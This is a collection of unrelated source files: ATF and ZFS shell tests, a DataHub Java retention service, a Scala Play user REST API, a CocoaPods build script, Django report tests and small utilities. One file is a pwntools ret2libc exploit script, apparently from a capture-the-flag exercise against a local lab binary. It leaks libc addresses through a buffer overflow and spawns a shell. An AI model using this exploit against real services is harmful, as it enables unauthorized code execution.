    h="$(atf_get_srcdir)/misc_helpers -s $(atf_get_srcdir)"

    atf_check -s eq:1 -o save:stdout -e save:stderr -x \
        "${h} atf_check_experr_mismatch"
    grep 'Executing command.*echo bar' stdout >/dev/null || \
        atf_fail "atf_check does not print an informative message"
    grep 'stdout' stderr >/dev/null && \
        atf_fail "atf_check prints the stdout header"
    grep 'stderr does not match golden output' stderr >/dev/null || \
        atf_fail "atf_check does not print the stderr header"
    grep '^-foo' stderr >/dev/null || \
        atf_fail "atf_check does not print the stderr's diff"
    grep '^+bar' stderr >/dev/null || \
        atf_fail "atf_check does not print the stderr's diff"
}

# Checks that unexpected stdout output is echoed back to the user.
atf_test_case null_stdout
null_stdout_head()
{
    atf_set "descr" "Verifies that atf_check prints a the stdout it got" \
                    "when it was supposed to be null"
}
null_stdout_body()
{
    h="$(atf_get_srcdir)/misc_helpers -s $(atf_get_srcdir)"

    atf_check -s eq:1 -o save:stdout -e save:stderr -x \
        "${h} atf_check_null_stdout"
    grep 'Executing command.*echo.*These.*contents' stdout >/dev/null || \
        atf_fail "atf_check does not print an informative message"
    grep 'stdout not empty' stderr >/dev/null || \
        atf_fail "atf_check does not print the stdout header"
    grep 'stderr' stderr >/dev/null && \
        atf_fail "atf_check prints the stderr header"
    grep 'These are the contents' stderr >/dev/null || \
        atf_fail "atf_check does not print stdout's contents"
}

# Checks that unexpected stderr output is echoed back to the user.
atf_test_case null_stderr
null_stderr_head()
{
    atf_set "descr" "Verifies that atf_check prints a the stderr it got" \
                    "when it was supposed to be null"
}
null_stderr_body()
{
    h="$(atf_get_srcdir)/misc_helpers -s $(atf_get_srcdir)"

    atf_check -s eq:1 -o save:stdout -e save:stderr -x \
        "${h} atf_check_null_stderr"
    grep 'Executing command.*echo.*These.*contents' stdout >/dev/null || \
        atf_fail "atf_check does not print an informative message"
    grep 'stdout' stderr >/dev/null && \
        atf_fail "atf_check prints the stdout header"
    grep 'stderr not empty' stderr >/dev/null || \
        atf_fail "atf_check does not print the stderr header"
    grep 'These are the contents' stderr >/dev/null || \
        atf_fail "atf_check does not print stderr's contents"
}

# Checks atf_check_equal in both plain and eval'd (deferred expansion) form;
# the failure message must land in the results file.
atf_test_case equal
equal_head()
{
    atf_set "descr" "Verifies that atf_check_equal works"
}
equal_body()
{
    h="$(atf_get_srcdir)/misc_helpers -s $(atf_get_srcdir)"

    atf_check -s eq:0 -o ignore -e ignore -x "${h} atf_check_equal_ok"

    atf_check -s eq:1 -o ignore -e ignore -x \
        "${h} -r resfile atf_check_equal_fail"
    atf_check -s eq:0 -o ignore -e empty grep '^failed: a != b (a != b)$' \
        resfile

    atf_check -s eq:0 -o ignore -e ignore -x "${h} atf_check_equal_eval_ok"

    atf_check -s eq:1 -o ignore -e ignore -x \
        "${h} -r resfile atf_check_equal_eval_fail"
    atf_check -s eq:0 -o ignore -e empty \
        grep '^failed: \${x} != \${y} (a != b)$' resfile
}

atf_init_test_cases()
{
    atf_add_test_case info_ok
    atf_add_test_case expout_mismatch
    atf_add_test_case experr_mismatch
    atf_add_test_case null_stdout
    atf_add_test_case null_stderr
    atf_add_test_case equal
}

# vim: syntax=sh:expandtab:shiftwidth=4:softtabstop=4
<filename>metadata-io/src/main/java/com/linkedin/metadata/entity/RetentionService.java package com.linkedin.metadata.entity; import com.google.common.collect.ImmutableList; import com.google.common.collect.ImmutableSet; import com.linkedin.common.AuditStamp; import com.linkedin.common.urn.Urn; import com.linkedin.data.template.RecordTemplate; import com.linkedin.events.metadata.ChangeType; import com.linkedin.metadata.Constants; import com.linkedin.metadata.key.DataHubRetentionKey; import com.linkedin.metadata.utils.EntityKeyUtils; import com.linkedin.metadata.utils.GenericRecordUtils; import com.linkedin.mxe.GenericAspect; import com.linkedin.mxe.MetadataChangeProposal; import com.linkedin.retention.DataHubRetentionConfig; import com.linkedin.retention.Retention; import java.util.Collections; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.concurrent.CompletableFuture; import java.util.stream.Collectors; import javax.annotation.Nonnull; import javax.annotation.Nullable; import lombok.SneakyThrows; import lombok.Value; /** * Service coupled with an {@link EntityService} to handle aspect record retention. * * TODO: This class is abstract with storage-specific implementations. It'd be nice to pull storage and retention * concerns apart, let (into {@link AspectDao}) deal with storage, and merge all retention concerns into a single * class. 
*/
public abstract class RetentionService {
  // Wildcard used in retention keys to mean "any entity" / "any aspect".
  protected static final String ALL = "*";
  protected static final String DATAHUB_RETENTION_ENTITY = "dataHubRetention";
  protected static final String DATAHUB_RETENTION_ASPECT = "dataHubRetentionConfig";
  protected static final String DATAHUB_RETENTION_KEY_ASPECT = "dataHubRetentionKey";

  // Storage-specific subclasses supply the entity service used for all reads/writes.
  protected abstract EntityService getEntityService();

  /**
   * Fetch retention policies given the entityName and aspectName
   * Uses the entity service to fetch the latest retention policies set for the input entity and aspect
   *
   * @param entityName Name of the entity
   * @param aspectName Name of the aspect
   * @return retention policies to apply to the input entity and aspect
   */
  public Retention getRetention(@Nonnull String entityName, @Nonnull String aspectName) {
    // Prioritized list of retention keys to fetch
    List<Urn> retentionUrns = getRetentionKeys(entityName, aspectName);
    Map<Urn, List<RecordTemplate>> fetchedAspects =
        getEntityService().getLatestAspects(new HashSet<>(retentionUrns), ImmutableSet.of(DATAHUB_RETENTION_ASPECT));
    // Find the first retention info that is set among the prioritized list of retention keys above
    Optional<DataHubRetentionConfig> retentionInfo = retentionUrns.stream()
        .flatMap(urn -> fetchedAspects.getOrDefault(urn, Collections.emptyList())
            .stream()
            .filter(aspect -> aspect instanceof DataHubRetentionConfig))
        .map(retention -> (DataHubRetentionConfig) retention)
        .findFirst();
    // No policy found anywhere in the fallback chain -> empty Retention record.
    return retentionInfo.map(DataHubRetentionConfig::getRetention).orElse(new Retention());
  }

  // Get list of datahub retention keys that match the input entity name and aspect name.
  // Ordered most-specific first: (entity, aspect), (entity, *), (*, aspect), (*, *).
  protected List<Urn> getRetentionKeys(@Nonnull String entityName, @Nonnull String aspectName) {
    return ImmutableList.of(
        new DataHubRetentionKey().setEntityName(entityName).setAspectName(aspectName),
        new DataHubRetentionKey().setEntityName(entityName).setAspectName(ALL),
        new DataHubRetentionKey().setEntityName(ALL).setAspectName(aspectName),
        new DataHubRetentionKey().setEntityName(ALL).setAspectName(ALL))
        .stream()
        .map(key -> EntityKeyUtils.convertEntityKeyToUrn(key, DATAHUB_RETENTION_ENTITY))
        .collect(Collectors.toList());
  }

  /**
   * Set retention policy for given entity and aspect. If entity or aspect names are null, the policy is set as default
   *
   * @param entityName Entity name to apply policy to. If null, set as "*",
   *                   meaning it will be the default for any entities without specified policy
   * @param aspectName Aspect name to apply policy to. If null, set as "*",
   *                   meaning it will be the default for any aspects without specified policy
   * @param retentionConfig Retention policy
   * @return whether ingesting the retention config aspect resulted in an update
   */
  @SneakyThrows
  public boolean setRetention(@Nullable String entityName, @Nullable String aspectName,
      @Nonnull DataHubRetentionConfig retentionConfig) {
    // Reject nonsensical policies (non-positive limits) before persisting anything.
    validateRetention(retentionConfig.getRetention());
    DataHubRetentionKey retentionKey = new DataHubRetentionKey();
    retentionKey.setEntityName(entityName != null ? entityName : ALL);
    retentionKey.setAspectName(aspectName != null ? aspectName : ALL);
    Urn retentionUrn = EntityKeyUtils.convertEntityKeyToUrn(retentionKey, DATAHUB_RETENTION_ENTITY);
    // Two proposals are ingested in order: first the key aspect, then the config aspect.
    MetadataChangeProposal keyProposal = new MetadataChangeProposal();
    GenericAspect keyAspect = GenericRecordUtils.serializeAspect(retentionKey);
    keyProposal.setAspect(keyAspect);
    keyProposal.setAspectName(DATAHUB_RETENTION_KEY_ASPECT);
    keyProposal.setEntityType(DATAHUB_RETENTION_ENTITY);
    keyProposal.setChangeType(ChangeType.UPSERT);
    keyProposal.setEntityUrn(retentionUrn);
    AuditStamp auditStamp =
        new AuditStamp().setActor(Urn.createFromString(Constants.SYSTEM_ACTOR)).setTime(System.currentTimeMillis());
    getEntityService().ingestProposal(keyProposal, auditStamp);
    // clone() keeps urn/entity-type/change-type; only the aspect name and payload differ.
    MetadataChangeProposal aspectProposal = keyProposal.clone();
    GenericAspect retentionAspect = GenericRecordUtils.serializeAspect(retentionConfig);
    aspectProposal.setAspect(retentionAspect);
    aspectProposal.setAspectName(DATAHUB_RETENTION_ASPECT);
    return getEntityService().ingestProposal(aspectProposal, auditStamp).isDidUpdate();
  }

  /**
   * Delete the retention policy set for given entity and aspect.
   *
   * @param entityName Entity name to apply policy to. If null, set as "*",
   *                   meaning it will delete the default policy for any entities without specified policy
   * @param aspectName Aspect name to apply policy to. If null, set as "*",
   *                   meaning it will delete the default policy for any aspects without specified policy
   */
  public void deleteRetention(@Nullable String entityName, @Nullable String aspectName) {
    DataHubRetentionKey retentionKey = new DataHubRetentionKey();
    retentionKey.setEntityName(entityName != null ? entityName : ALL);
    retentionKey.setAspectName(aspectName != null ? aspectName : ALL);
    Urn retentionUrn = EntityKeyUtils.convertEntityKeyToUrn(retentionKey, DATAHUB_RETENTION_ENTITY);
    getEntityService().deleteUrn(retentionUrn);
  }

  // Throws IllegalArgumentException when version/time limits are not strictly positive.
  private void validateRetention(Retention retention) {
    if (retention.hasVersion()) {
      if (retention.getVersion().getMaxVersions() <= 0) {
        throw new IllegalArgumentException("Invalid maxVersions: " + retention.getVersion().getMaxVersions());
      }
    }
    if (retention.hasTime()) {
      if (retention.getTime().getMaxAgeInSeconds() <= 0) {
        throw new IllegalArgumentException("Invalid maxAgeInSeconds: " + retention.getTime().getMaxAgeInSeconds());
      }
    }
  }

  /**
   * Apply retention policies given the urn and aspect name asynchronously
   *
   * @param urn Urn of the entity
   * @param aspectName Name of the aspect
   * @param context Additional context that could be used to apply retention
   */
  public void applyRetentionAsync(@Nonnull Urn urn, @Nonnull String aspectName, Optional<RetentionContext> context) {
    // NOTE(review): runs on the common ForkJoinPool; confirm that is acceptable for this workload.
    CompletableFuture.runAsync(() -> applyRetention(urn, aspectName, context));
  }

  /**
   * Apply retention policies given the urn and aspect name
   *
   * @param urn Urn of the entity
   * @param aspectName Name of the aspect
   * @param context Additional context that could be used to apply retention
   */
  public void applyRetention(@Nonnull Urn urn, @Nonnull String aspectName, Optional<RetentionContext> context) {
    Retention retentionPolicy = getRetention(urn.getEntityType(), aspectName);
    // An empty record means "no retention configured" -- nothing to do.
    if (retentionPolicy.data().isEmpty()) {
      return;
    }
    applyRetention(urn, aspectName, retentionPolicy, context);
  }

  /**
   * Apply retention policies given the urn and aspect name and policies
   * @param urn Urn of the entity
   * @param aspectName Name of the aspect
   * @param retentionPolicy Retention policies to apply
   * @param retentionContext Additional context that could be used to apply retention
   */
  public abstract void applyRetention(@Nonnull Urn urn, @Nonnull String aspectName, Retention retentionPolicy,
      Optional<RetentionContext> retentionContext);

  /**
   * Batch apply retention to all records that match the input entityName and aspectName
   *
   * @param entityName Name of the entity to apply retention to. If null, applies to all entities
   * @param aspectName Name of the aspect to apply retention to. If null, applies to all aspects
   */
  public abstract void batchApplyRetention(@Nullable String entityName, @Nullable String aspectName);

  // Optional hints passed through to the storage-specific retention implementation.
  @Value
  public static class RetentionContext {
    Optional<Long> maxVersion;
  }
}
package rest

import models.User
import play.api.libs.json.{JsValue, JsError, Json, Writes}
import play.api.mvc.{Action, AnyContent, BodyParsers, Controller, RequestHeader}
import services.UserService

/**
 * REST API for the User Class.
 */
object Users extends Controller {

  // A user plus the absolute URL under which it is reachable (HATEOAS link target).
  private case class HateoasUser(user: User, url: String)

  // Wraps a user with its self-URL, derived from the reverse router and the
  // current request's host.
  private def mkHateoasUser(user: User)(implicit request: RequestHeader): HateoasUser = {
    val url = routes.Users.user(user.name).absoluteURL()
    HateoasUser(user, url)
  }

  // JSON serializer: the user payload plus "self" (GET) and "remove" (DELETE) links.
  private implicit val hateoasUserWrites = new Writes[HateoasUser] {
    def writes(huser: HateoasUser): JsValue = Json.obj(
      "user" -> Json.obj(
        "id" -> huser.user.id,
        "name" -> huser.user.name
      ),
      "links" -> Json.arr(
        Json.obj(
          "rel" -> "self",
          "href" -> huser.url,
          "method" -> "GET"
        ),
        Json.obj(
          "rel" -> "remove",
          "href" -> huser.url,
          "method" -> "DELETE"
        )
      )
    )
  }

  /**
   * Get all users.
   * {{{
   * curl --include http://localhost:9000/api/users
   * }}}
   * @return all users in a JSON representation.
   */
  def users: Action[AnyContent] = Action { implicit request =>
    val users = UserService.registeredUsers
    Ok(Json.obj(
      "users" -> Json.toJson(users.map { user => Json.toJson(mkHateoasUser(user)) }),
      "links" -> Json.arr(
        Json.obj(
          "rel" -> "self",
          "href" -> routes.Users.users.absoluteURL(),
          "method" -> "GET"
        ),
        Json.obj(
          "rel" -> "create",
          "href" -> routes.Users.addUser.absoluteURL(),
          "method" -> "POST"
        )
      )
    )
    )
  }

  /**
   * Gets a user by id.
   * Use for example
   * {{{
   * curl --include http://localhost:9000/api/user/1
   * }}}
   * @param name user name
   * @return user info in a JSON representation.
   */
  def user(name: String): Action[AnyContent] = Action { implicit request =>
    // NOTE(review): find{...}.headOption is redundant -- find already returns
    // an Option; left as-is since behavior is identical.
    UserService.registeredUsers.find {
      _.name == name
    }.headOption.map { user =>
      Ok(Json.toJson(mkHateoasUser(user)))
    }.getOrElse(NotFound)
  }

  // Expected JSON body for addUser: {"name": "..."}.
  private case class Username(name: String)

  private implicit val usernameReads = Json.reads[Username]

  /**
   * Create a new user by a POST request including the user name as JSON content.
   * Use for example
   * {{{
   * curl --include --request POST --header "Content-type: application/json"
   * --data '{"name" : "WieAuchImmer"}' http://localhost:9000/api/user
   * }}}
   * @return info about the new user in a JSON representation
   */
  def addUser: Action[JsValue] = Action(BodyParsers.parse.json) { implicit request =>
    val username = request.body.validate[Username]
    username.fold(
      errors => {
        BadRequest(Json.obj("status" -> "OK", "message" -> JsError.toFlatJson(errors)))
      },
      username => {
        Ok(Json.obj("status" -> "OK",
          "user" -> Json.toJson(mkHateoasUser(UserService.addUser(username.name, username.name, 5, false, true))))) // Change later if needed
      }
    )
  }

  /**
   * Delete a user by id using a DELETE request.
   * {{{
   * curl --include --request DELETE http://localhost:9000/api/user/1
   * }}}
   * @param id the user id.
   * @return success info or NotFound
   */
  def rmUser(id: Long): Action[AnyContent] = Action { implicit request =>
    val success = UserService.rmUser(id)
    if (success) Ok(Json.obj("status" -> "OK")) else NotFound
  }
}
import java.util.Scanner; public class Calculation { public static void main(String[] args) { Scanner scanner = new Scanner(System.in); System.out.print("Enter a series of numbers separated by spaces (e.g 1 2 3 4 5): "); String[] numbersString = scanner.nextLine().trim().split("\\s+"); int[] numbers = new int[numbersString.length]; for (int i = 0; i < numbersString.length; i++) { numbers[i] = Integer.parseInt(numbersString[i]); } int sum = 0; double average = 0.0; int max = Integer.MIN_VALUE; int min = Integer.MAX_VALUE; for (int number : numbers) { sum += number; max = Math.max(max, number); min = Math.min(min, number); } average = sum * 1.0 / numbers.length; System.out.println("The sum is " + sum + " the average is " + average + " the maximum is " + max + " and the minimum is " + min); } }
#!/usr/bin/env python from pwn import * libc = ELF('libc.so') elf = ELF('level2') #p = process('./level2') p = remote('127.0.0.1', 10003) plt_write = elf.symbols['write'] print 'plt_write= ' + hex(plt_write) got_write = elf.got['write'] print 'got_write= ' + hex(got_write) vulfun_addr = 0x08048404 print 'vulfun= ' + hex(vulfun_addr) payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(got_write) + p32(4) print "\n###sending payload1 ...###" p.send(payload1) print "\n###receving write() addr...###" write_addr = u32(p.recv(4)) print 'write_addr=' + hex(write_addr) print "\n###calculating system() addr and \"/bin/sh\" addr...###" system_addr = write_addr - (libc.symbols['write'] - libc.symbols['system']) print 'system_addr= ' + hex(system_addr) binsh_addr = write_addr - (libc.symbols['write'] - next(libc.search('/bin/sh'))) print 'binsh_addr= ' + hex(binsh_addr) payload2 = 'a'*140 + p32(system_addr) + p32(vulfun_addr) + p32(binsh_addr) print "\n###sending payload2 ...###" p.send(payload2) p.interactive()
<filename>src/backend/db/migrations/20190102174432_add_version.js exports.up = async (knex) => { await knex.schema.table('points', table => table.integer('year')); await knex('points').update('year', 2018); }; exports.down = knex => knex.schema.table('points', table => table.dropColumn('year'));
#!/bin/sh
# CocoaPods "Embed Frameworks" build phase: copies vendored frameworks and
# dSYMs into the app bundle, strips architectures not being built, and
# re-signs when required.
# NOTE(review): `set -o pipefail`, `function`, `trap ... ERR` and arrays are
# bashisms; under a strictly POSIX /bin/sh (e.g. dash) this script would fail.
# Confirm the build environment's /bin/sh is bash before relying on it.
set -e
set -u
set -o pipefail

function on_error {
  echo "$(realpath -mq "${0}"):$1: error: Unexpected failure"
}
trap 'on_error $LINENO' ERR

if [ -z ${FRAMEWORKS_FOLDER_PATH+x} ]; then
  # If FRAMEWORKS_FOLDER_PATH is not set, then there's nowhere for us to copy
  # frameworks to, so exit 0 (signalling the script phase was successful).
  exit 0
fi

echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"

COCOAPODS_PARALLEL_CODE_SIGN="${COCOAPODS_PARALLEL_CODE_SIGN:-false}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"

# Used as a return value for each invocation of `strip_invalid_archs` function.
STRIP_BINARY_RETVAL=0

# This protects against multiple targets copying the same framework dependency at the same time. The solution
# was originally proposed here: https://lists.samba.org/archive/rsync/2008-February/020158.html
RSYNC_PROTECT_TMP_FILES=(--filter "P .*.??????")

# Copies and strips a vendored framework
install_framework()
{
  # Resolve the framework source: built products dir first (full path, then
  # basename), falling back to the literal argument.
  if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
    local source="${BUILT_PRODUCTS_DIR}/$1"
  elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
    local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
  elif [ -r "$1" ]; then
    local source="$1"
  fi

  local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"

  if [ -L "${source}" ]; then
    echo "Symlinked..."
    source="$(readlink "${source}")"
  fi

  # Use filter instead of exclude so missing patterns don't throw errors.
  echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
  rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"

  local basename
  basename="$(basename -s .framework "$1")"
  binary="${destination}/${basename}.framework/${basename}"

  # Fall back to a bare binary, and resolve a symlinked destination binary.
  if ! [ -r "$binary" ]; then
    binary="${destination}/${basename}"
  elif [ -L "${binary}" ]; then
    echo "Destination binary is symlinked..."
    dirname="$(dirname "${binary}")"
    binary="${dirname}/$(readlink "${binary}")"
  fi

  # Strip invalid architectures so "fat" simulator / device frameworks work on device
  if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
    strip_invalid_archs "$binary"
  fi

  # Resign the code if required by the build settings to avoid unstable apps
  code_sign_if_enabled "${destination}/$(basename "$1")"

  # Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
  if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
    local swift_runtime_libs
    swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u)
    for lib in $swift_runtime_libs; do
      echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
      rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
      code_sign_if_enabled "${destination}/${lib}"
    done
  fi
}

# Copies and strips a vendored dSYM
install_dsym() {
  local source="$1"
  if [ -r "$source" ]; then
    # Copy the dSYM into a the targets temp dir.
    echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${DERIVED_FILES_DIR}\""
    rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${DERIVED_FILES_DIR}"

    local basename
    basename="$(basename -s .framework.dSYM "$source")"
    binary="${DERIVED_FILES_DIR}/${basename}.framework.dSYM/Contents/Resources/DWARF/${basename}"

    # Strip invalid architectures so "fat" simulator / device frameworks work on device
    if [[ "$(file "$binary")" == *"Mach-O dSYM companion"* ]]; then
      strip_invalid_archs "$binary"
    fi

    if [[ $STRIP_BINARY_RETVAL == 1 ]]; then
      # Move the stripped file into its final destination.
      echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${DERIVED_FILES_DIR}/${basename}.framework.dSYM\" \"${DWARF_DSYM_FOLDER_PATH}\""
      rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${DERIVED_FILES_DIR}/${basename}.framework.dSYM" "${DWARF_DSYM_FOLDER_PATH}"
    else
      # The dSYM was not stripped at all, in this case touch a fake folder so the input/output paths from Xcode do not reexecute this script because the file is missing.
      touch "${DWARF_DSYM_FOLDER_PATH}/${basename}.framework.dSYM"
    fi
  fi
}

# Signs a framework with the provided identity
code_sign_if_enabled() {
  if [ -n "${EXPANDED_CODE_SIGN_IDENTITY:-}" -a "${CODE_SIGNING_REQUIRED:-}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
    # Use the current code_sign_identity
    echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
    local code_sign_cmd="/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS:-} --preserve-metadata=identifier,entitlements '$1'"

    # Background the signing when parallel signing is enabled; the script waits at the end.
    if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
      code_sign_cmd="$code_sign_cmd &"
    fi
    echo "$code_sign_cmd"
    eval "$code_sign_cmd"
  fi
}

# Strip invalid architectures
strip_invalid_archs() {
  binary="$1"
  # Get architectures for current target binary
  binary_archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | awk '{$1=$1;print}' | rev)"
  # Intersect them with the architectures we are building for
  intersected_archs="$(echo ${ARCHS[@]} ${binary_archs[@]} | tr ' ' '\n' | sort | uniq -d)"
  # If there are no archs supported by this binary then warn the user
  if [[ -z "$intersected_archs" ]]; then
    echo "warning: [CP] Vendored binary '$binary' contains architectures ($binary_archs) none of which match the current build architectures ($ARCHS)."
    STRIP_BINARY_RETVAL=0
    return
  fi
  stripped=""
  for arch in $binary_archs; do
    if ! [[ "${ARCHS}" == *"$arch"* ]]; then
      # Strip non-valid architectures in-place
      lipo -remove "$arch" -output "$binary" "$binary"
      stripped="$stripped $arch"
    fi
  done
  if [[ "$stripped" ]]; then
    echo "Stripped $binary of architectures:$stripped"
  fi
  STRIP_BINARY_RETVAL=1
}


if [[ "$CONFIGURATION" == "Debug" ]]; then
  install_framework "${BUILT_PRODUCTS_DIR}/QinaggePodTest/QinaggePodTest.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
  install_framework "${BUILT_PRODUCTS_DIR}/QinaggePodTest/QinaggePodTest.framework"
fi
# Wait for any backgrounded parallel codesign jobs before finishing the phase.
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
  wait
fi
#!/bin/bash for X in `find . -maxdepth 1 -type f -not -path "./thumbnails"`; do if [ ! -f "./thumbnails/${X}" ]; then echo "Generating thumbnail for ${X}..." convert -resize 400x225^ -gravity center -extent 400x225 -strip -interlace Plane -quality 85 "${X}" "./thumbnails/${X}" fi if [[ $(find ${X} -type f -size +409600c 2>/dev/null) ]]; then echo "Resizing ${X}..." convert -resize 1024 -strip -interlace Plane -quality 95 "${X}" "${X}" fi done
import {h} from 'composi' export default () => ( <header> <h1>HackerNews Minimal</h1> <h5>Made with Composi</h5> </header> )
// sbt build definition for the "spray-tutorial" project
// (part of a Twitter engine simulation built on Akka + Spray).

name := "spray-tutorial"

version := "1.0"

scalaVersion := "2.11.2"

// Spray artifacts are served from the project's own repository.
// NOTE(review): plain-HTTP resolver — confirm whether an https URL works.
resolvers += "spray repo" at "http://repo.spray.io"

// Single version shared by all spray modules below.
val sprayVersion = "1.3.1"

libraryDependencies ++= Seq(
  "com.typesafe.akka" %% "akka-actor" % "2.3.6",
  "com.typesafe.akka" %% "akka-http-experimental" % "0.7",
  "io.spray" %% "spray-routing" % sprayVersion,
  "io.spray" %% "spray-client" % sprayVersion,
  "io.spray" %% "spray-testkit" % sprayVersion % "test",
  "org.json4s" %% "json4s-native" % "3.2.10",
  "com.typesafe.scala-logging" %% "scala-logging-slf4j" % "2.1.2",
  "ch.qos.logback" % "logback-classic" % "1.1.2",
  "org.scalatest" %% "scalatest" % "2.2.2" % "test",
  "org.mockito" % "mockito-all" % "1.9.5" % "test"
)
"""
Report Engine Tests.
"""
from base import Report
from filtercontrols import FilterControl
from django.test import TestCase
from django import forms

import reportengine


class BasicTestReport(Report):
    """Minimal concrete Report used to exercise the engine.

    Rows, labels, aggregates and the filter form are injectable so tests
    control exactly what the report returns.
    """

    slug = "test"
    namespace = "testing"
    verbose_name = "Basic Test Report"

    def __init__(self, rows=None, labels=None, aggregate=None, filterform=None):
        # Fix: the original signature used mutable/stateful defaults
        # (rows=[[1,2,3]] and filterform=forms.Form() evaluated once at
        # definition time), which are shared by every instance ever built.
        # Build fresh defaults per instantiation instead; passing explicit
        # arguments behaves exactly as before.
        self.rows = [[1, 2, 3]] if rows is None else rows
        self.labels = ["col1", "col2", "col3"] if labels is None else labels
        self.aggregate = (("total", 1),) if aggregate is None else aggregate
        self.filterform = forms.Form() if filterform is None else filterform

    def get_rows(self, filters=None, order_by=None):
        """Return (rows, aggregate); filters/order_by are ignored here."""
        # `filters` originally defaulted to a mutable {}; it is unused, so a
        # None default is a safe, backward-compatible replacement.
        return self.rows, self.aggregate

    def get_filter_form(self, request):
        """Return the injected filter form regardless of the request."""
        return self.filterform


class BasicReportTest(TestCase):
    def test_report_register(self):
        """
        Tests registering a report, and verifies report is now accessible
        """
        report = BasicTestReport()
        reportengine.register(report)
        # TestCase assertions instead of bare assert(): they survive `python -O`
        # and give useful failure messages.
        self.assertEqual(reportengine.get_report("testing", "test"), report)

        found = False
        for key, registered in reportengine.all_reports():
            if key == (report.namespace, report.slug):
                self.assertEqual(registered, report)
                found = True
        self.assertTrue(found)
#!/bin/ksh -p # # CDDL HEADER START # # This file and its contents are supplied under the terms of the # Common Development and Distribution License ("CDDL"), version 1.0. # You may only use this file in accordance with the terms of version # 1.0 of the CDDL. # # A full copy of the text of the CDDL should have accompanied this # source. A copy of the CDDL is also available via the Internet at # http://www.illumos.org/license/CDDL. # # CDDL HEADER END # # # Copyright (c) 2019 by Tim Chase. All rights reserved. # Copyright (c) 2019 Lawrence Livermore National Security, LLC. # . $STF_SUITE/include/libtest.shlib . $STF_SUITE/tests/functional/cli_root/zpool_trim/zpool_trim.kshlib # # DESCRIPTION: # Trimming can be performed multiple times # # STRATEGY: # 1. Create a pool with a single disk. # 2. Trim the entire pool. # 3. Verify trimming is reset (status, offset, and action date). # 4. Repeat steps 2 and 3 with the existing pool. # DISK1=${DISKS%% *} log_must zpool create -f $TESTPOOL $DISK1 typeset action_date="none" for n in {1..3}; do log_must zpool trim -r 2G $TESTPOOL log_mustnot eval "trim_prog_line $TESTPOOL $DISK1 | grep complete" [[ "$(trim_progress $TESTPOOL $DISK1)" -lt "100" ]] || log_fail "Trimming progress wasn't reset" new_action_date="$(trim_prog_line $TESTPOOL $DISK1 | \ sed 's/.*ed at \(.*\)).*/\1/g')" [[ "$action_date" != "$new_action_date" ]] || log_fail "Trimming action date wasn't reset" action_date=$new_action_date while [[ "$(trim_progress $TESTPOOL $DISK1)" -lt "100" ]]; do progress="$(trim_progress $TESTPOOL $DISK1)" sleep 0.5 [[ "$progress" -le "$(trim_progress $TESTPOOL $DISK1)" ]] || log_fail "Trimming progress regressed" done log_must eval "trim_prog_line $TESTPOOL $DISK1 | grep complete" sleep 1 done log_pass "Trimming multiple times performs as expected"
#! /usr/bin/bash
# Thin wrapper: run the given command inside the python_latest.sif
# Singularity container.
#
# Fixes over the original:
#  - "$@" (quoted) forwards each argument verbatim; the unquoted $@ re-split
#    arguments containing whitespace.
#  - `exec` replaces the shell so signals and the exit status pass straight
#    through to the containerized command.
exec singularity exec python_latest.sif "$@"
from sigauth.middleware import SignatureCheckMiddlewareBase
from sigauth.utils import RequestSigner

# Shared-secret fixtures used by every test below.
SECRET = 'super secret'
SENDER_ID = 'test sender'


class SignatureRejectionMiddleware(SignatureCheckMiddlewareBase):
    # Concrete middleware under test; only the secret needs overriding.
    secret = SECRET


def test_signature_rejection_rejects_missing_signature(rf):
    """A request with no signature header is rejected with 401."""
    request = rf.get('/')
